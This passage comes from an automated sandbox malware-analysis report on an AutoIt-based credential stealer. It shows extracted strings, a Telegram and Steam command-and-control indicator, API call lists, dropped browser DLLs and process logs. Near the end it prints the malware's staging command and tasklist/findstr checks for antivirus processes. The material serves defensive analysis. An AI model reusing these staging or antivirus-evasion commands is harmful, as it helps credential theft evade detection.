                Source: Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/stats/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: Spice.pif, 0000000B.00000003.2179892773.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180038050.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017C8000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180478356.0000000001821000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180335897.00000000017C9000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180269405.00000000017A1000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2179949168.00000000016C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/snsb82
                Source: Spice.pif, 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/snsb82At
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: softokn3.dll.11.dr, freebl3.dll.11.dr, nss3[1].dll.11.dr, nss3.dll.11.dr, mozglue[1].dll.11.dr, softokn3[1].dll.11.dr, mozglue.dll.11.dr, freebl3[1].dll.11.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: DGDAEHCB.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Spice.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1353808235.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Automation.0.dr, Spice.pif.2.drString found in binary or memory: https://www.globalsign.com/repository/06
                Source: DGDAEHCB.11.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: Spice.pif, 0000000B.00000002.2621187844.0000000001790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A0F000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2622802244.000000000484A000.00000040.00001000.00020000.00000000.sdmp, 76561199677575543[1].htm.11.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 23.7.115.52:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.8:49710 version: TLS 1.2
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056A8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EE4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00EE4830
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EE4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00EE4632
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED0508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,11_2_00ED0508
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EFD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00EFD164
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED42D5: CreateFileW,DeviceIoControl,CloseHandle,11_2_00ED42D5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EC8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00EC8F2E
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00ED5778
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_00406BFE0_2_00406BFE
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E7B02011_2_00E7B020
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E794E011_2_00E794E0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E79C8011_2_00E79C80
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E923F511_2_00E923F5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EF840011_2_00EF8400
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA650211_2_00EA6502
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E7E6F011_2_00E7E6F0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA265E11_2_00EA265E
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9282A11_2_00E9282A
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA89BF11_2_00EA89BF
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA6A7411_2_00EA6A74
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EF0A3A11_2_00EF0A3A
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E80BE011_2_00E80BE0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ECEDB211_2_00ECEDB2
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9CD5111_2_00E9CD51
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EF0EB711_2_00EF0EB7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED8E4411_2_00ED8E44
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA6FE611_2_00EA6FE6
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E933B711_2_00E933B7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E8D45D11_2_00E8D45D
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9F40911_2_00E9F409
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E7F6A011_2_00E7F6A0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E916B411_2_00E916B4
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E7166311_2_00E71663
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E8F62811_2_00E8F628
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E978C311_2_00E978C3
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E91BA811_2_00E91BA8
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9DBA511_2_00E9DBA5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EA9CE511_2_00EA9CE5
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E8DD2811_2_00E8DD28
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E91FC011_2_00E91FC0
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00E9BFD611_2_00E9BFD6
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\HCAEGCBFHJDG\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\HCAEGCBFHJDG\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: String function: 00E98B30 appears 42 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: String function: 00E90D17 appears 70 times
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: String function: 00E81A36 appears 34 times
                Source: 0dN59ZIkEM.exeStatic PE information: invalid certificate
                Source: 0dN59ZIkEM.exe, 00000000.00000003.1354277819.000000000282B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs 0dN59ZIkEM.exe
                Source: 0dN59ZIkEM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/39@2/3
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EDA6AD GetLastError,FormatMessageW,11_2_00EDA6AD
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EC8DE9 AdjustTokenPrivileges,CloseHandle,11_2_00EC8DE9
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00EC9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00EC9399
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_00404954 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404954
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,11_2_00ED4148
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pifCode function: 11_2_00ED443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_00ED443D
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\WeddingJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_03
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeFile created: C:\Users\user\AppData\Local\Temp\nssD828.tmpJump to behavior
                Source: 0dN59ZIkEM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr, sqln[1].dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: GIIDBGDAFHJDHIDGDGII.11.dr, JJJEGHDAECBFHJKEGIJK.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                Source: Spice.pif, 0000000B.00000002.2627022059.0000000010218000.00000002.00001000.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2623868667.0000000006EE2000.00000004.00000800.00020000.00000000.sdmp, sqln[1].dll.11.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: softokn3.dll.11.dr, softokn3[1].dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                Source: 0dN59ZIkEM.exeReversingLabs: Detection: 47%
                Source: 0dN59ZIkEM.exeVirustotal: Detection: 41%
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeFile read: C:\Users\user\Desktop\0dN59ZIkEM.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\0dN59ZIkEM.exe "C:\Users\user\Desktop\0dN59ZIkEM.exe"
                Source: C:\Users\user\Desktop\0dN59ZIkEM.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151
